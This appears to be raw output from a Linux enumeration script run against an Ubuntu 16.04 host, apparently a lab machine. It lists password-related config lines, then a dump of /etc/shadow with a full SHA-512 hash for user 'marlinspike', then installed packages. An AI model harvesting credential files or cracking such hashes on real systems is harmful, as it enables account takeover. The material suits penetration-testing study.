/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/security/pwquality.conf:# Configuration for systemwide password quality limits
/etc/security/pwquality.conf:# Number of characters in the new password that must not be present in the
/etc/security/pwquality.conf:# old password.
/etc/security/pwquality.conf:# Minimum acceptable size for the new password (plus one if
/etc/security/pwquality.conf:# The maximum credit for having digits in the new password. If less than 0
/etc/security/pwquality.conf:# it is the minimum number of digits in the new password.
/etc/security/pwquality.conf:# The maximum credit for having uppercase characters in the new password.
/etc/security/pwquality.conf:# password.
/etc/security/pwquality.conf:# The maximum credit for having lowercase characters in the new password.
/etc/security/pwquality.conf:# password.
/etc/security/pwquality.conf:# The maximum credit for having other characters in the new password.
/etc/security/pwquality.conf:# password.
/etc/security/pwquality.conf:# password (digits, uppercase, lowercase, others).
/etc/security/pwquality.conf:# The maximum number of allowed consecutive same characters in the new password.
/etc/security/pwquality.conf:# new password.
/etc/ltrace.conf:; pwd.h
/etc/mysql/mysql.conf.d/mysqld.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
/etc/mysql/my.cnf.fallback:# It has been reported that passwords should be enclosed with ticks/quotes [+] Shadow File (Privileged)
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:*:17379:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7::: [*] ENUMERATING PROCESSES AND APPLICATIONS... [+] Installed Packages
Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
Err?=(none)/Reinst-required (Status,Err:
Name Version Description
a11y-profile-manager-indicator 0.1.10-0ubuntu3 Accessibility Profile Manager - Unity desktop indicator
account-plugin-facebook 0.12+16.04.20160126-0ubuntu1 GNOME Control Center account plugin for single signon - facebook
account-plugin-flickr 0.12+16.04.20160126-0ubuntu1 GNOME Control Center account plugin for single signon - flickr
account-plugin-google 0.12+16.04.20160126-0ubuntu1 GNOME Control Center account plugin for single signon
accountsservice 0.6.40-2ubuntu11.3 query and manipulate user account information
acl 2.2.52-3 Access control list utilities
acpi-support 0.142 scripts for handling many ACPI events
acpid 1:2.0.26-1ubuntu2 Advanced Configuration and Power Interface event daemon
activity-log-manager 0.9.7-0ubuntu23.16.04.1 blacklist configuration user interface for Zeitgeist
adduser 3.113+nmu3ubuntu4 add and remove users and groups
adium-theme-ubuntu 0.3.4-0ubuntu1.1 Adium message style for Ubuntu
adwaita-icon-theme 3.18.0-2ubuntu3.1 default icon theme of GNOME (small subset)
aisleriot 1:3.18.2-1ubuntu1 GNOME solitaire card game collection
alsa-base 1.0.25+dfsg-0ubuntu5 ALSA driver configuration files
alsa-utils 1.1.0-0ubuntu5 Utilities for configuring and using ALSA
anacron 2.3-23 cron-like program that doesn't go by time
apache2 2.4.18-2ubuntu3.5 Apache HTTP Server
apache2-bin 2.4.18-2ubuntu3.5 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.18-2ubuntu3.5 Apache HTTP Server (common files)
apache2-utils 2.4.18-2ubuntu3.5 Apache HTTP Server (utility programs for web servers)
apg 2.2.3.dfsg.1-2ubuntu1 Automated Password Generator - Standalone version
app-install-data 15.10 Ubuntu applications (data files)
app-install-data-partner 16.04 Application Installer (data files for partner applications/repositories)
apparmor 2.10.95-0ubuntu2.7 user-space parser utility for AppArmor
appmenu-qt:amd64 0.2.7+14.04.20140305-0ubuntu2 application menu for Qt
appmenu-qt5 0.3.0+16.04.20170216-0ubuntu1 application menu for Qt5
apport 2.20.1-0ubuntu2.10 automatically generate crash reports for debugging
apport-gtk 2.20.1-0ubuntu2.10 GTK+ frontend for the apport crash report system
apport-symptoms 0.20 symptom scripts for apport
appstream 0.9.4-1ubuntu3 Software component index
apt 1.2.24 commandline package manager
apt-transport-https 1.2.24 https download transport for APT
apt-utils 1.2.24 package management related utility programs
aptdaemon 1.1.1+bzr982-0ubuntu14 transaction based package management service
aptdaemon-data 1.1.1+bzr982-0ubuntu14 data files for clients
apturl 0.5.2ubuntu11.1 install packages using the apt protocol - GTK+ frontend
apturl-common 0.5.2ubuntu11.1 install packages using the apt protocol - common data
aspell 0.60.7~20110707-3build1 GNU Aspell spell-checker
aspell-en 7.1-0-1.1 English dictionary for GNU Aspell
at-spi2-core 2.18.3-4ubuntu1 Assistive Technology Service Provider Interface (dbus core)
avahi-autoipd 0.6.32~rc+dfsg-1ubuntu2 Avahi IPv4LL network address configuration daemon
avahi-daemon 0.6.32~rc+dfsg-1ubuntu2 Avahi mDNS/DNS-SD daemon
avahi-utils 0.6.32~rc+dfsg-1ubuntu2 Avahi browsing, publishing and discovery utilities
bamfdaemon 0.5.3~bzr0+16.04.20160824-0ubuntu1 Window matching library - daemon
baobab 3.18.1-1ubuntu1 GNOME disk usage analyzer
base-files 9.4ubuntu4.5 Debian base system miscellaneous files
base-passwd 3.5.39 Debian base system master password and group files
bash 4.3-14ubuntu1.2 GNU Bourne Again SHell
bash-completion 1:2.1-4.2ubuntu1.1 programmable completion for the bash shell
bc 1.06.95-9build1 GNU bc arbitrary precision calculator language
bind9-host 1:9.10.3.dfsg.P4-8ubuntu1.8 Version of 'host' bundled with BIND 9.X
binutils 2.26.1-1ubuntu1~16.04.5 GNU assembler, linker and binary utilities
bluez 5.37-0ubuntu5.1 Bluetooth tools and daemons
bluez-cups 5.37-0ubuntu5.1 Bluetooth printer driver for CUPS
bluez-obexd 5.37-0ubuntu5.1 bluez obex daemon
branding-ubuntu 0.8 Replacement artwork with Ubuntu branding
brltty 5.3.1-2ubuntu2.1 Access software for a blind person using a braille display
bsdmainutils 9.0.6ubuntu3 collection of more utilities from FreeBSD
bsdutils 1:2.27.1-6ubuntu3.3 basic utilities from 4.4BSD-Lite
build-essential 12.1ubuntu2 Informational list of build-essential packages
busybox-initramfs 1:1.22.0-15ubuntu1 Standalone shell setup for initramfs
busybox-static 1:1.22.0-15ubuntu1 Standalone rescue shell with tons of builtin utilities
bzip2 1.0.6-8 high-quality block-sorting file compressor - utilities
ca-certificates 20170717~16.04.1 Common CA certificates
checkbox-converged 1.2.4-0ubuntu1 testing tool for all Ubuntu devices
checkbox-gui 1.2.4-0ubuntu1 QML based interface for checkbox (transitional package)
cheese 3.18.1-2ubuntu3 tool to take pictures and videos from your webcam
cheese-common 3.18.1-2ubuntu3 Common files for the Cheese tool to take pictures and videos
colord 1.2.12-1ubuntu1 system service to manage device colour profiles -- system daemon
colord-data 1.2.12-1ubuntu1 system service to manage device colour profiles -- data files
command-not-found 0.3ubuntu16.04.2 Suggest installation of packages in interactive bash sessions
command-not-found-data 0.3ubuntu16.04.2 Set of data files for command-not-found.
compiz 1:0.9.12.2+16.04.20160823-0ubuntu1 OpenGL window and compositing manager
compiz-core 1:0.9.12.2+16.04.20160823-0ubuntu1 OpenGL window and compositing manager
compiz-gnome 1:0.9.12.2+16.04.20160823-0ubuntu1 OpenGL window and compositing manager - GNOME window decorator
compiz-plugins-default:amd64 1:0.9.12.2+16.04.20160823-0ubuntu1 OpenGL window and compositing manager - default plugins
console-setup 1.108ubuntu15.3 console font and keymap setup program
console-setup-linux 1.108ubuntu15.3 Linux specific part of console-setup
coreutils 8.25-2ubuntu3~16.04 GNU core utilities
cpio 2.11+dfsg-5ubuntu1 GNU cpio -- a program to manage archives of files
cpp 4:5.3.1-1ubuntu1 GNU C preprocessor (cpp)
cpp-5 5.4.0-6ubuntu1~16.04.5 GNU C preprocessor
cracklib-runtime 2.9.2-1ubuntu1 runtime support for password checker library cracklib2
crda 3.13-1 wireless Central Regulatory Domain Agent
cron 3.0pl1-128ubuntu2 process scheduling daemon
cups 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - PPD/driver support, web interface
cups-browsed 1.8.3-2ubuntu3.1 OpenPrinting CUPS Filters - cups-browsed
cups-bsd 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - BSD commands
cups-client 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - client programs (SysV)
cups-common 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - common files
cups-core-drivers 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - PPD-less printing
cups-daemon 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - daemon
cups-filters 1.8.3-2ubuntu3.1 OpenPrinting CUPS Filters - Main Package
cups-filters-core-drivers 1.8.3-2ubuntu3.1 OpenPrinting CUPS Filters - PPD-less printing
cups-pk-helper 0.2.5-2ubuntu2 PolicyKit helper to configure cups with fine-grained privileges
cups-ppdc 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - PPD manipulation utilities
cups-server-common 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - server common files
dash 0.5.8-2.1ubuntu2 POSIX-compliant shell
dbus 1.10.6-1ubuntu3.3 simple interprocess messaging system (daemon and utilities)
dbus-x11 1.10.6-1ubuntu3.3 simple interprocess messaging system (X11 deps)
dc 1.06.95-9build1 GNU dc arbitrary precision reverse-polish calculator
dconf-cli 0.24.0-2 simple configuration storage system - utilities
dconf-gsettings-backend:amd64 0.24.0-2 simple configuration storage system - GSettings back-end
dconf-service 0.24.0-2 simple configuration storage system - D-Bus service
debconf 1.5.58ubuntu1 Debian configuration management system
debconf-i18n 1.5.58ubuntu1 full internationalization support for debconf
debianutils 4.7 Miscellaneous utilities specific to Debian
deja-dup 34.2-0ubuntu1.1 Back up your files
desktop-file-utils 0.22-1ubuntu5.1 Utilities for .desktop files
dh-python 2.20151103ubuntu1.1 Debian helper tools for packaging Python libraries and applications
dictionaries-common 1.26.3 spelling dictionaries - common utilities
diffstat 1.61-1 produces graph of changes introduced by a diff file
diffutils 1:3.3-3 File comparison utilities
dirmngr 2.1.11-6ubuntu2 server for managing certificate revocation lists
distro-info-data 0.28ubuntu0.5 information about the distributions' releases (data files)
dmidecode 3.0-2ubuntu0.1 SMBIOS/DMI table decoder
dmz-cursor-theme 0.4.4ubuntu1 Style neutral, scalable cursor theme
dns-root-data 2015052300+h+1 DNS root data including root zone and DNSSEC key
dnsmasq-base 2.75-1ubuntu0.16.04.3 Small caching DNS proxy and DHCP/TFTP server
dnsutils 1:9.10.3.dfsg.P4-8ubuntu1.8 Clients provided with BIND
doc-base 0.10.7 utilities to manage online documentation
dosfstools 3.0.28-2ubuntu0.1 utilities for making and checking MS-DOS FAT filesystems
dpkg 1.18.4ubuntu1.2 Debian package management system
dpkg-dev 1.18.4ubuntu1.2 Debian package development tools
e2fslibs:amd64 1.42.13-1ubuntu1 ext2/ext3/ext4 file system libraries
e2fsprogs 1.42.13-1ubuntu1 ext2/ext3/ext4 file system utilities
ed 1.10-2 classic UNIX line editor
efibootmgr 0.12-4 Interact with the EFI Boot Manager
eject 2.1.5+deb1+cvs20081104-13.1ubuntu0.16.04.1 ejects CDs and operates CD-Changers under Linux
emacsen-common 2.0.8 Common facilities for all emacsen
enchant 1.6.0-10.1build2 Wrapper for various spell checker engines (binary programs)
eog 3.18.2-1ubuntu2.1 Eye of GNOME graphics viewer program
espeak-data:amd64 1.48.04+dfsg-2 Multi-lingual software speech synthesizer: speech data files
ethtool 1:4.5-1 display or change Ethernet device settings
evince 3.18.2-1ubuntu4.2 Document (PostScript, PDF) viewer
evince-common 3.18.2-1ubuntu4.2 Document (PostScript, PDF) viewer - common files
evolution-data-server 3.18.5-1ubuntu1 evolution database backend server
evolution-data-server-common 3.18.5-1ubuntu1 architecture independent files for Evolution Data Server
evolution-data-server-online-accounts 3.18.5-1ubuntu1 evolution data server integration with Ubuntu Online Accounts
example-content 49 Ubuntu example content
fakeroot 1.20.2-1ubuntu1 tool for simulating superuser privileges
file 1:5.25-2ubuntu1 Determines file type using "magic" numbers
file-roller 3.16.5-0ubuntu1.2 archive manager for GNOME
findutils 4.6.0+git+20160126-2 utilities for finding files--find, xargs
firefox 56.0+build6-0ubuntu0.16.04.2 Safe and easy web browser from Mozilla
firefox-locale-en 56.0+build6-0ubuntu0.16.04.2 English language pack for Firefox
fontconfig 2.11.94-0ubuntu1.1 generic font configuration library - support binaries
fontconfig-config 2.11.94-0ubuntu1.1 generic font configuration library - configuration
fonts-dejavu-core 2.35-1 Vera font family derivate with additional characters
fonts-freefont-ttf 20120503-4 Freefont Serif, Sans and Mono Truetype fonts
fonts-guru 2:1.2 Meta package to install all Punjabi fonts
fonts-guru-extra 2.0-3 Free fonts for Punjabi language
fonts-kacst 2.01+mry-12 KACST free TrueType Arabic fonts
fonts-kacst-one 5.0+svn11846-7 TrueType font designed for Arabic language
fonts-khmeros-core 5.0-7ubuntu1 KhmerOS Unicode fonts for the Khmer language of Cambodia
fonts-lao 0.0.20060226-9 TrueType font for Lao language
fonts-liberation 1.07.4-1 Fonts with the same metrics as Times, Arial and Courier
fonts-lklug-sinhala 0.6-3 Unicode Sinhala font by Lanka Linux User Group
fonts-lohit-guru 2.5.3-2 Lohit TrueType font for Punjabi Language
fonts-nanum 20140930-1 Nanum Korean fonts
fonts-noto-cjk 1:1.004+repack2-1~ubuntu1 "No Tofu" font families with large Unicode coverage (CJK)
fonts-opensymbol 2:102.7+LibO5.1.6~rc2-0ubuntu1~xenial2 OpenSymbol TrueType font
fonts-sil-abyssinica 1.500-1 smart Unicode font for Ethiopian and Erythrean scripts (Amharic et al.)
fonts-sil-padauk 2.80-2 smart Unicode font for languages in Myanmar
fonts-stix 1.1.1-4 Scientific and Technical Information eXchange fonts
fonts-symbola 2.59-1 symbolic font providing emoji characters from Unicode 7.0
fonts-takao-pgothic 003.02.01-9ubuntu3 Japanese TrueType font set, Takao P Gothic Fonts
fonts-thai-tlwg 1:0.6.2-2.1 Thai fonts maintained by TLWG (metapackage)
fonts-*-machine 1.901b-5 font for *, Dzongkha and Ladakhi (OpenType Unicode)
fonts-tlwg-garuda 1:0.6.2-2.1 Thai Garuda font (dependency package)
fonts-tlwg-garuda-ttf 1:0.6.2-2.1 Thai Garuda TrueType font
fonts-tlwg-kinnari 1:0.6.2-2.1 Thai Kinnari font (dependency package)
fonts-tlwg-kinnari-ttf 1:0.6.2-2.1 Thai Kinnari TrueType font
fonts-tlwg-laksaman 1:0.6.2-2.1 Thai Laksaman font (dependency package)
fonts-tlwg-laksaman-ttf 1:0.6.2-2.1 Thai Laksaman TrueType font
fonts-tlwg-loma 1:0.6.2-2.1 Thai Loma font (dependency package)
fonts-tlwg-loma-ttf 1:0.6.2-2.1 Thai Loma TrueType font
fonts-tlwg-mono 1:0.6.2-2.1 Thai TlwgMono font (dependency package)
fonts-tlwg-mono-ttf 1:0.6.2-2.1 Thai TlwgMono TrueType font
fonts-tlwg-norasi 1:0.6.2-2.1 Thai Norasi font (dependency package)
fonts-tlwg-norasi-ttf 1:0.6.2-2.1 Thai Norasi TrueType font
fonts-tlwg-purisa 1:0.6.2-2.1 Thai Purisa font (dependency package)
fonts-tlwg-purisa-ttf 1:0.6.2-2.1 Thai Purisa TrueType font
fonts-tlwg-sawasdee 1:0.6.2-2.1 Thai Sawasdee font (dependency package)
fonts-tlwg-sawasdee-ttf 1:0.6.2-2.1 Thai Sawasdee TrueType font
fonts-tlwg-typewriter 1:0.6.2-2.1 Thai TlwgTypewriter font (dependency package)
fonts-tlwg-typewriter-ttf 1:0.6.2-2.1 Thai TlwgTypewriter TrueType font
fonts-tlwg-typist 1:0.6.2-2.1 Thai TlwgTypist font (dependency package)
fonts-tlwg-typist-ttf 1:0.6.2-2.1 Thai TlwgTypist TrueType font
fonts-tlwg-typo 1:0.6.2-2.1 Thai TlwgTypo font (dependency package)
fonts-tlwg-typo-ttf 1:0.6.2-2.1 Thai TlwgTypo TrueType font
fonts-tlwg-umpush 1:0.6.2-2.1 Thai Umpush font (dependency package)
fonts-tlwg-umpush-ttf 1:0.6.2-2.1 Thai Umpush TrueType font
fonts-tlwg-waree 1:0.6.2-2.1 Thai Waree font (dependency package)
fonts-tlwg-waree-ttf 1:0.6.2-2.1 Thai Waree TrueType font
foomatic-db-compressed-ppds 20160212-0ubuntu1 OpenPrinting printer support - Compressed PPDs derived from the database
friendly-recovery 0.2.31 Make recovery more user-friendly
ftp 0.17-33 classical file transfer client
fuse 2.9.4-1ubuntu3.1 Filesystem in Userspace
fwupd 0.7.0-0ubuntu4.3 Firmware update daemon
fwupdate 0.5-2ubuntu5 Tools to manage UEFI firmware updates
fwupdate-signed 1.11.1+0.5-2ubuntu5 Linux Firmware Updater EFI signed binary
g++ 4:5.3.1-1ubuntu1 GNU C++ compiler
g++-5 5.4.0-6ubuntu1~16.04.5 GNU C++ compiler
gcc 4:5.3.1-1ubuntu1 GNU C compiler
gcc-5 5.4.0-6ubuntu1~16.04.5 GNU C compiler
gcc-5-base:amd64 5.4.0-6ubuntu1~16.04.5 GCC, the GNU Compiler Collection (base package)
gcc-6-base:amd64 6.0.1-0ubuntu1 GCC, the GNU Compiler Collection (base package)
gconf-service 3.2.6-3ubuntu6 GNOME configuration database system (D-Bus service)
gconf-service-backend 3.2.6-3ubuntu6 GNOME configuration database system (D-Bus service)
gconf2 3.2.6-3ubuntu6 GNOME configuration database system (support tools)
gconf2-common 3.2.6-3ubuntu6 GNOME configuration database system (common files)
gcr 3.18.0-1ubuntu1 GNOME crypto services (daemon and tools)
gdb 7.11.1-0ubuntu1~16.5 GNU Debugger
gdbserver 7.11.1-0ubuntu1~16.5 GNU Debugger (remote server)
gdisk 1.0.1-1build1 GPT fdisk text-mode partitioning tool
gedit 3.18.3-0ubuntu4 official text editor of the GNOME desktop environment
gedit-common 3.18.3-0ubuntu4 official text editor of the GNOME desktop environment (support files)
genisoimage 9:1.1.11-3ubuntu1 Creates ISO-9660 CD-ROM filesystem images
geoclue 0.12.99-4ubuntu1 Geographic information framework
geoclue-ubuntu-geoip 1.0.2+14.04.20131125-0ubuntu2 Provide positioning for GeoClue via Ubuntu GeoIP services
geoip-database 20160408-1 IP lookup command line tools that use the GeoIP library (country database)
gettext 0.19.7-2ubuntu3 GNU Internationalization utilities
gettext-base 0.19.7-2ubuntu3 GNU Internationalization utilities for the base system
ghostscript 9.18~dfsg~0-0ubuntu2.7 interpreter for the PostScript language and for PDF
ghostscript-x 9.18~dfsg~0-0ubuntu2.7 interpreter for the PostScript language and for PDF - X11 support
gir1.2-accounts-1.0:amd64 1.21+16.04.20160222-0ubuntu1 typelib file for libaccounts-glib0
gir1.2-appindicator3-0.1 12.10.1+16.04.20170215-0ubuntu1 Typelib files for libappindicator3-1.
gir1.2-atk-1.0 2.18.0-1 ATK accessibility toolkit (GObject introspection)
gir1.2-atspi-2.0 2.18.3-4ubuntu1 Assistive Technology Service Provider (GObject introspection)
gir1.2-dbusmenu-glib-0.4:amd64 16.04.1+16.04.20160927-0ubuntu1 typelib file for libdbusmenu-glib4
gir1.2-dee-1.0 1.2.7+15.04.20150304-0ubuntu2 GObject introspection data for the Dee library
gir1.2-freedesktop:amd64 1.46.0-3ubuntu1 Introspection data for some FreeDesktop components
gir1.2-gdata-0.0:amd64 0.17.4-1 GObject introspection data for the GData webservices library
gir1.2-gdkpixbuf-2.0:amd64 2.32.2-1ubuntu1.3 GDK Pixbuf library - GObject-Introspection
gir1.2-glib-2.0:amd64 1.46.0-3ubuntu1 Introspection data for GLib, GObject, Gio and GModule
gir1.2-gnomekeyring-1.0 3.12.0-1build1 GNOME keyring services library - introspection data
gir1.2-goa-1.0:amd64 3.18.3-1ubuntu2 Introspection data for GNOME Online Accounts
gir1.2-gst-plugins-base-1.0 1.8.3-1ubuntu0.2 GObject introspection data for the GStreamer Plugins Base library
gir1.2-gstreamer-1.0 1.8.3-1~ubuntu0.1 GObject introspection data for the GStreamer library
gir1.2-gtk-3.0:amd64 3.18.9-1ubuntu3.3 GTK+ graphical user interface library -- gir bindings
gir1.2-gtksource-3.0:amd64 3.18.2-1 gir files for the GTK+ syntax highlighting widget
gir1.2-gudev-1.0:amd64 1:230-2 libgudev-1.0 introspection data
gir1.2-ibus-1.0:amd64 1.5.11-1ubuntu2 Intelligent Input Bus - introspection data
gir1.2-javascriptcoregtk-4.0:amd64 2.18.0-0ubuntu0.16.04.2 JavaScript engine library from WebKitGTK+ - GObject introspection data
gir1.2-json-1.0:amd64 1.1.2-0ubuntu1 GLib JSON manipulation library (introspection data)
gir1.2-notify-0.7 0.7.6-2svn1 sends desktop notifications to a notification daemon (Introspection files)
gir1.2-packagekitglib-1.0 0.8.17-4ubuntu6~gcc5.4ubuntu1.2 GObject introspection data for the PackageKit GLib library
gir1.2-pango-1.0:amd64 1.38.1-1 Layout and rendering of internationalized text - gir bindings
gir1.2-peas-1.0:amd64 1.16.0-1ubuntu2 Application plugin library (introspection files)
gir1.2-rb-3.0:amd64 3.3-1ubuntu7 GObject introspection data for the rhythmbox music player
gir1.2-secret-1:amd64 0.18.4-1ubuntu2 Secret store (GObject-Introspection)
gir1.2-signon-1.0 1.13+16.04.20151209.1-0ubuntu1 GObject introspection data for the Signon library
gir1.2-soup-2.4 2.52.2-1ubuntu0.2 GObject introspection data for the libsoup HTTP library
gir1.2-totem-1.0:amd64 3.18.1-1ubuntu4 GObject introspection data for Totem media player
gir1.2-totem-plparser-1.0:amd64 3.10.6-1ubuntu1 GObject introspection data for the Totem Playlist Parser library
gir1.2-udisks-2.0:amd64 2.1.7-1ubuntu1 GObject based library to access udisks2 - introspection data
gir1.2-unity-5.0:amd64 7.1.4+16.04.20160701-0ubuntu1 GObject introspection data for the Unity library
gir1.2-vte-2.91:amd64 0.42.5-1ubuntu1 GObject introspection data for the VTE library
gir1.2-webkit2-4.0:amd64 2.18.0-0ubuntu0.16.04.2 Web content engine library for GTK+ - GObject introspection data
gir1.2-wnck-3.0:amd64 3.14.1-2 GObject introspection data for the WNCK library
gkbd-capplet 3.6.0-1ubuntu2 GNOME control center tools for libgnomekbd
glib-networking:amd64 2.48.2-1~ubuntu16.04.1 network-related giomodules for GLib
glib-networking-common 2.48.2-1~ubuntu16.04.1 network-related giomodules for GLib - data files
glib-networking-services 2.48.2-1~ubuntu16.04.1 network-related giomodules for GLib - D-Bus services
gnome-accessibility-themes 3.18.0-2ubuntu1 Accessibility themes for the GNOME desktop
gnome-bluetooth 3.18.2-1ubuntu2 GNOME Bluetooth tools
gnome-calculator 1:3.18.3-0ubuntu1.16.04.1 GNOME desktop calculator
gnome-calendar 3.20.4-0ubuntu0.1 Calendar application for GNOME
gnome-desktop3-data 3.18.2-1ubuntu1 Common files for GNOME desktop apps
gnome-disk-utility 3.18.3.1-1ubuntu1 manage and configure disk drives and media
gnome-font-viewer 3.16.2-1ubuntu1 font viewer for GNOME
gnome-keyring 3.18.3-0ubuntu2 GNOME keyring services (daemon and tools)
gnome-mahjongg 1:3.18.0-1 classic Eastern tile game for GNOME
gnome-menus 3.13.3-6ubuntu3.1 GNOME implementation of the freedesktop menu specification
gnome-mines 1:3.18.2-2 popular minesweeper puzzle game for GNOME
gnome-orca 3.18.2-1ubuntu3 Scriptable screen reader
gnome-power-manager 3.18.0-1ubuntu1 power management tool for the GNOME desktop
gnome-screensaver 3.6.1-7ubuntu4 GNOME screen saver and locker
gnome-screenshot 3.18.0-1ubuntu2 screenshot application for GNOME
gnome-session-bin 3.18.1.2-1ubuntu1.16.04.2 GNOME Session Manager - Minimal runtime
gnome-session-canberra 0.30-2.1ubuntu1 GNOME session log in and log out sound events
gnome-session-common 3.18.1.2-1ubuntu1.16.04.2 GNOME Session Manager - common files
gnome-settings-daemon-schemas 3.18.2-0ubuntu3.1 gnome-settings-daemon schemas
gnome-software 3.20.5-0ubuntu0.16.04.6 Software Center for GNOME
gnome-software-common 3.20.5-0ubuntu0.16.04.6 Software Center for GNOME (common files)
gnome-sudoku 1:3.18.4-0ubuntu2 Sudoku puzzle game for GNOME
gnome-system-log 3.9.90-4 system log viewer for GNOME
gnome-system-monitor 3.18.2-1ubuntu1 Process viewer and system resource monitor for GNOME
gnome-terminal 3.18.3-1ubuntu1 GNOME terminal emulator application
gnome-terminal-data 3.18.3-1ubuntu1 Data files for the GNOME terminal emulator
gnome-user-guide 3.18.1-1 GNOME user's guide
gnome-user-share 3.14.2-2ubuntu4 User level public file sharing via WebDAV or ObexFTP
gnome-video-effects 0.4.1-3ubuntu1 Collection of GStreamer effects
gnupg 1.4.20-1ubuntu3.1 GNU privacy guard - a free PGP replacement
gnupg-agent 2.1.11-6ubuntu2 GNU privacy guard - cryptographic agent
gnupg2 2.1.11-6ubuntu2 GNU privacy guard - a free PGP replacement (new v2.x)
gpgv 1.4.20-1ubuntu3.1 GNU privacy guard - signature verification tool
grep 2.25-1~16.04.1 GNU grep, egrep and fgrep
grilo-plugins-0.2-base:amd64 0.2.17-0ubuntu2 Framework for discovering and browsing media - Base Plugins
groff-base 1.22.3-7 GNU troff text-formatting system (base system components)
grub-common 2.02~beta2-36ubuntu3.14 GRand Unified Bootloader (common files)
grub-gfxpayload-lists 0.7 GRUB gfxpayload blacklist
grub-pc 2.02~beta2-36ubuntu3.14 GRand Unified Bootloader, version 2 (PC/BIOS version)
grub-pc-bin 2.02~beta2-36ubuntu3.14 GRand Unified Bootloader, version 2 (PC/BIOS binaries)
grub2-common 2.02~beta2-36ubuntu3.14 GRand Unified Bootloader (common files for version 2)
gsettings-desktop-schemas 3.18.1-1ubuntu1 GSettings desktop-wide schemas
gsettings-ubuntu-schemas 0.0.5+16.04.20160307-0ubuntu1 GSettings deskop-wide schemas for Ubuntu
gsfonts 1:8.11+urwcyr1.0.7~pre44-4.2ubuntu1 Fonts for the Ghostscript interpreter(s)
gstreamer1.0-alsa:amd64 1.8.3-1ubuntu0.2 GStreamer plugin for ALSA
gstreamer1.0-clutter-3.0 3.0.18-1 Clutter PLugin for GStreamer 1.0
gstreamer1.0-plugins-base:amd64 1.8.3-1ubuntu0.2 GStreamer plugins from the "base" set
gstreamer1.0-plugins-base-apps 1.8.3-1ubuntu0.2 GStreamer helper programs from the "base" set
gstreamer1.0-plugins-good:amd64 1.8.3-1ubuntu0.4 GStreamer plugins from the "good" set
gstreamer1.0-pulseaudio:amd64 1.8.3-1ubuntu0.4 GStreamer plugin for PulseAudio
gstreamer1.0-tools 1.8.3-1~ubuntu0.1 Tools for use with GStreamer
gstreamer1.0-x:amd64 1.8.3-1ubuntu0.2 GStreamer plugins for X11 and Pango
gtk2-engines-murrine:amd64 0.98.2-0ubuntu2.2 cairo-based gtk+-2.0 theme engine
gucharmap 1:3.18.2-1ubuntu1 Unicode character picker and font browser
guile-2.0-libs:amd64 2.0.11+1-10 Core Guile libraries
gvfs:amd64 1.28.2-1ubuntu1~16.04.2 userspace virtual filesystem - GIO module
gvfs-backends 1.28.2-1ubuntu1~16.04.2 userspace virtual filesystem - backends
gvfs-bin 1.28.2-1ubuntu1~16.04.2 userspace virtual filesystem - binaries
gvfs-common 1.28.2-1ubuntu1~16.04.2 userspace virtual filesystem - common data files
gvfs-daemons 1.28.2-1ubuntu1~16.04.2 userspace virtual filesystem - servers
gvfs-fuse 1.28.2-1ubuntu1~16.04.2 userspace virtual filesystem - fuse server
gvfs-libs:amd64 1.28.2-1ubuntu1~16.04.2 userspace virtual filesystem - private libraries
gzip 1.6-4ubuntu1 GNU compression utilities
hardening-includes 2.7ubuntu2 Makefile for enabling compiler flags for security hardening
hdparm 9.48+ds-1 tune hard disk parameters for high performance
hicolor-icon-theme 0.15-0ubuntu1 default fallback theme for FreeDesktop.org icon themes
hostname 3.16ubuntu2 utility to set/show the host name or domain name
hplip 3.16.3+repack0-1 HP Linux Printing and Imaging System (HPLIP)
hplip-data 3.16.3+repack0-1 HP Linux Printing and Imaging - data files
hud 14.10+16.04.20160415-0ubuntu1 Backend for the Unity HUD
humanity-icon-theme 0.6.10.1 Humanity Icon theme
hunspell-en-us 20070829-6ubuntu3 English_american dictionary for hunspell
hwdata 0.267-1 hardware identification / configuration data
hyphen-en-us 2.8.8-2ubuntu1 US English hyphenation patterns for LibreOffice/OpenOffice.org
ibus 1.5.11-1ubuntu2 Intelligent Input Bus - core
